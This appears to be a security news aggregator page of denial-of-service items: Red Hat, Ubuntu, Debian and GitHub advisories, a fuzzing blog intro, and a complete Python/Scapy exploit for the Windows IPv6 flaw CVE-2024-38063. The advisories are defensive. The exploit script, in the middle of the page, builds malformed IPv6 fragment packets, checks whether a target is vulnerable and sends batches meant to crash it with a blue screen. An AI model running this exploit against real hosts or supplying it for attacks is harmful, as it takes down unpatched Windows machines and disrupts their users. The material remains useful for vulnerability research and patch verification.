Red Hat Security Advisory 2024-6156-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6156.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:6156-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6156Issue date:         2024-09-03Revision:           03CVE Names:          CVE-2022-48799====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (CVE-2024-40995)* kernel: perf: Fix list corruption in perf_cgroup_switch() (CVE-2022-48799)* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48799References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297579https://bugzilla.redhat.com/show_bug.cgi?id=2298135https://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6156-03

Ubuntu Security Notice 6982-1 - It was discovered that Dovecot did not not properly have restrictions on the size of address headers. A remote attacker could possibly use this issue to cause denial of service.

    ==========================================================================Ubuntu Security Notice USN-6982-1September 02, 2024dovecot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in Dovecot.Software Description:- dovecot: IMAP and POP3 email serverDetails:It was discovered that Dovecot did not not properly have restrictions onithe size of address headers. A remote attacker could possibly use thisissue to cause denial of service. (CVE-2024-23184, CVE-2024-23185)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  dovecot-core                    1:2.3.21+dfsg1-2ubuntu6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6982-1  CVE-2024-23184, CVE-2024-23185Package Information:  https://launchpad.net/ubuntu/+source/dovecot/1:2.3.21+dfsg1-2ubuntu6

Ubuntu Security Notice USN-6982-1

### Impact
A user could create a large file that freewvs will try to read, which will terminate a scan process.

### Patches
This has been patched by limiting the data freewvs reads:
https://github.com/schokokeksorg/freewvs/commit/18bbf2043e53f69e0119d24f8ae4edb274afb9b2

**freewvs vulnerable to denial of service through large files**

Low severity GitHub Reviewed Published Jul 6, 2020 in schokokeksorg/freewvs • Updated Aug 30, 2024

GHSA-9cfv-9463-8gqv: freewvs vulnerable to denial of service through large files

Debian Linux Security Advisory 5761-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5761-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7969 CVE-2024-8193 CVE-2024-8194 CVE-2024-8198Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.113-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbRHeAACgkQZF0CR8NudjdiRA/9HmOr5Ptx9ykaQPZsUQolr3OR0gSDNgQtLYVYEWo/Zag3EDlRDDXXC5FKG+ujkWMF9w2OwZjR8j8dH0TFvz/xyI5gM7CdyDMv3FnM0afLaEASkv8EBAW5MLVdOcScfh+TRFrL7XvMW3SN4WtjSJzXiHSaYqrLBfstFy9wfjbQlnoldi6P4jJYuUiTOFb375FkmmjAs7eDF9qeuTvg2Fv2DZxdGJN52hl/saMhfTq46TEWcUTVpgxvXZMbB7T4bwn0FLCs9VGWmI27fO4F+AHT3HQgUTlubxdJvMQ/Z1aMZyQHA4xukVcRFfzHj/EzoWjGXjZe59TQx3QOADVUfVOdS4/mCG+rHhXlj3Hh3U7FrQP/SPCXZ6zcZBrNSG22EJUj3vMrlCikCZau4+0ZnlSfwAKYYenRi3qbfsv0t3Rx7XVRo2vTPVXka5T5NugdFykRdz1cTa0Y/ZllwdAh9yDQ1uFLM9k5xkGprm5yANEn//LUoM1oVviGwMF1oNHxJdupUO3diwu+Uc2GwLChjF9C0ISQYQMVx0SC3JhS41F9eKGamdzoHvJ/S4n8dDiveHlEJ8Np8Eiu3Pw+MRMNFEuBIr2Ets991gofe7WaafPu8SEV7wCbm/hUm6kl4hikcYQLO4d5v1yTOmxPBW03EpZSpBOF7DIOaj7EsWRohuUrMig==5K+x-----END PGP SIGNATURE-----

Debian Security Advisory 5761-1

Debian Linux Security Advisory 5760-1 - Multiple security issues were discovered in Ghostscript, the GPL PostScript/PDF interpreter, which could result in denial of service and potentially the execution of arbitrary code if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5760-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2024-29506 CVE-2024-29507 CVE-2024-29508 CVE-2024-29509Multiple security issues were discovered in Ghostscript, the GPLPostScript/PDF interpreter, which could result in denial of service andpotentially the execution of arbitrary code if malformed document filesare processed.For the stable distribution (bookworm), these problems have been fixed inversion 10.0.0~dfsg-11+deb12u5.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbQku1fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ryhw/9HZ3Ex7IRaIwKZvqanBkgjGakkk00PQES+3I9QRUMDuyKceUXxMZd3WoYGHjcvsIQmSHykmAxkuAZgBIE27eA7x/O/q12l5DekmNOaXNinhsDqWFfOXm+Ge2cA9UiyEIK5jl+Oef/NFoJeV4c+I5lbUoASdvudrg/GPuX182z7RHa3FN3d4ufXokU3gIDoWE72ToS79fKC6esLNpPxgJ5YyIJKZcyY8++SDhE+752BZQkKgyq6ci5n5oPAuPnxu93G8L73RLYrh1SeS3P5aCyEDFw6O5WNVLAMBIq8EPaSmuEWplH6uS7OIjbiGlo+WEaeniHMyKeCbUndwFlFqnL02SHqjXnUSK13BLgElw1pIAqXq8BUqcWl/RSiZO9f52t4kC9Ew8hhCw1rZmHDP0DICMe2ZiXFAPe7gdGOrc3fkb/gmtCgPOv1sV44Vl/Rb+PyDmAig26LyUD2F4ivVuMJMzFbM0ED0KFYT+bNx9WLcVPHA3TTj3td+pb2ixpTb96NTN5rSB70EkhC5MUFCaUQX9s6W8lse6wlVnLkMKtf67R8HqyVoTrZ3/Mz0un9hMSF6w/dA+CrOkUdoCcD+HloKPcMfP/W1ziGoO5cFkdr+fEwHfIxXwCJCY5DU1dQXqrJfM5Wfp4XP6scwj8qt9JWMeOauxg9YhEQRwfWd9FIX4==NB+2-----END PGP SIGNATURE-----

Debian Security Advisory 5760-1

Red Hat Security Advisory 2024-6044-03 - Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General Availability release images, which fix bugs and update container images. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6044.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: Red Hat Advanced Cluster Management 2.11.2 bug fixes and container updates  
Advisory ID:        RHSA-2024:6044-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6044  
Issue date:         2024-08-29  
Revision:           03  
CVE Names:          CVE-2022-25883  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix(es):  
CVE-2022-25883 nodejs-semver: Regular expression denial of service

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25883

References:

https://access.redhat.com/security/updates/classification/#low  
https://issues.redhat.com/browse/ACM-12908  
https://issues.redhat.com/browse/ACM-13041

Red Hat Security Advisory 2024-6044-03

Microsoft Windows IPv6 vulnerability checking proof of concept python script that causes a denial of service. Windows 10 and 11 versions under 10.0.26100.1457 and Server 2016-2019-2022 versions under 10.0.17763.6189 are affected.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service# Date: 2024-08-07# Exploit Author: Photubias# Vendor Homepage: https://microsoft.com# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189# Tested on: Windows 11 23H2 and Windows Server 2022# CVE: CVE-2024-38063import os, subprocess, re, time, sys## VariablessDstIP = 'fe80::78b7:6283:49ad:c565'        ## Placeholderif len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Please provide an argumentsDstMAC = '00:0C:29:55:E1:C8'               ## Not required, will try to get the MAC via Neighbor DiscoveryiBatches = 20iCorruptions = 20                           ## How many times do we want to corrupt the tcpip.sys memory per batchtry:    print('--- Loading Scapy, might take some time ...')    from scapy.config import conf    conf.ipv6_enabled = False    import scapy.all as scapy    scapy.conf.verb = 0except:    print('Error while loading scapy, please run "pip install scapy"')    exit(1)import logginglogging.getLogger('scapy.runtime').setLevel(logging.ERROR)def selectInterface(): #adapter[] = npfdevice, ip, mac    def getAllInterfaces():         lstInterfaces=[]        if os.name == 'nt':            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)            for bInterface in proc.stdout.readlines():                lstInt = bInterface.split(b',')                sAdapter = lstInt[0].strip(b'"').decode()                sDevicename = lstInt[1].strip(b'"').decode()                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]                except: sIP = ''                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add        else:            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)            for bInterface in proc.stdout.readlines():                lstInt = bInterface.strip().split(b' ')                try:                     if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])                except: pass        return lstInterfaces        lstInterfaces = getAllInterfaces()    if len(lstInterfaces) > 1:        i = 1        for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))            i += 1        #sAnswer = input('[?] Please select the adapter [1]: ')        sAnswer='3'    else: sAnswer = None    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1    iAnswer = int(sAnswer) - 1    sNPF = lstInterfaces[iAnswer][0]    sIP = lstInterfaces[iAnswer][1]    sMAC = lstInterfaces[iAnswer][2]    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])def get_packets(iID, sDstIPv6, sDstMac=None):    iFragID = 0xbedead00 + iID    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3    return [oPacket1, oPacket2, oPacket3]def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation    sMACResp = None    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr    return sMACResplstInt = selectInterface() ## NPF, IPv6, MAC, NamesMAC = doIPv6ND(sDstIP, lstInt[0])if sMAC:     print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')    sDstMAC = sMACelif sDstMAC != '':    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))else:     print('[-] Without a MAC address, this exploit will probably not work')lstPacketsToSend = []for i in range(iBatches):    for j in range(iCorruptions):        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))## Verification first: "ICMPv6ParamProblem"lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]:     print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))else:     input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')print('[i] Waiting 10 seconds to let the target cool down (more is better)')time.sleep(10)input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')########## Exploitprint('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))scapy.conf.verb = 1scapy.sendp(lstPacketsToSend, iface=lstInt[0])print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')

Microsoft Windows IPv6 CVE-2024-38063 Checker / Denial Of Service

Ubuntu Security Notice 6972-4 - Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the Linux Kernel contained a race condition, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6972-4August 28, 2024linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - GPU drivers;   - MMC subsystem;   - Network drivers;   - PHY drivers;   - Pin controllers subsystem;   - Xen hypervisor drivers;   - GFS2 file system;   - Core kernel;   - Bluetooth subsystem;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;   - ALSA SH drivers;(CVE-2024-26903, CVE-2024-35835, CVE-2023-52644, CVE-2024-39292,CVE-2024-36940, CVE-2024-26600, CVE-2023-52629, CVE-2024-35955,CVE-2023-52760, CVE-2023-52806, CVE-2024-39484, CVE-2024-26679,CVE-2024-26654, CVE-2024-36901, CVE-2024-26687, CVE-2023-52470)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-4.15.0-1134-oracle  4.15.0-1134.145                                   Available with Ubuntu Pro   linux-image-oracle-lts-18.04    4.15.0.1134.139                                   Available with Ubuntu ProUbuntu 16.04 LTS   linux-image-4.15.0-1134-oracle  4.15.0-1134.145~16.04.1                                   Available with Ubuntu Pro   linux-image-oracle              4.15.0.1134.145~16.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6972-4   https://ubuntu.com/security/notices/USN-6972-3   https://ubuntu.com/security/notices/USN-6972-2   https://ubuntu.com/security/notices/USN-6972-1   CVE-2023-52470, CVE-2023-52629, CVE-2023-52644, CVE-2023-52760,   CVE-2023-52806, CVE-2024-22099, CVE-2024-24860, CVE-2024-26600,   CVE-2024-26654, CVE-2024-26679, CVE-2024-26687, CVE-2024-26903,   CVE-2024-35835, CVE-2024-35955, CVE-2024-36901, CVE-2024-36940,   CVE-2024-39292, CVE-2024-39484

Ubuntu Security Notice USN-6972-4

Fuzzing has long been one of our favorite ways to search for security issues or vulnerabilities in software, but when it comes to fuzzing popular systems used in ICS environments, it traditionally involved a custom hardware setup to fuzz the code in its native environment.

Wednesday, August 28, 2024 12:00

Hunting for vulnerabilities in industrial environments has become increasingly important as industrial control systems and critical infrastructure face threats from state-sponsored actors and ransomware groups hoping to cash out on million-dollar payments.  

Fuzzing has long been one of our favorite ways to search for security issues or vulnerabilities in software, but when it comes to fuzzing popular systems used in ICS environments, it traditionally involved a custom hardware setup to fuzz the code in its native environment. 

However, I recently created my own fuzzer after Weston Embedded made its full µC/OS protocol stack source code openly available in 2020. µC/OS (also stylized as MicroC/OS) is a real-time operating system commonly used in resource-constrained embedded systems like industrial control systems. The operating system uses a scheduling mechanism to ensure efficient task management in industrial environments, and we recently discovered multiple vulnerabilities in the system that could allow an adversary to carry out a range of malicious actions, including causing a denial of service or gaining the ability to execute arbitrary code on the system.  

Today, we’re publishing a three-part look at how I created this fuzzer, the various hurdles I faced along the way, and how it used it to fuzz two different µC/OS protocol stacks. These individual posts are linked below. 

*   Part 1: HTTP server fuzzing
*   Part 2: Handling multiple requests per test case 
*   Part 3: TCP/IP server fuzzing, implementing a TAP driver

The vulnerabilities we uncovered by fuzzing µC/OS protocol stacks

Red Hat Security Advisory 2024-5906-03 - An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include denial of service and out of bounds write vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5906.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: squid security updateAdvisory ID:        RHSA-2024:5906-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5906Issue date:         2024-08-28Revision:           03CVE Names:          CVE-2024-37894====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Out-of-bounds write error may lead to Denial of Service (CVE-2024-37894)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37894References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2294353

Tag

#dos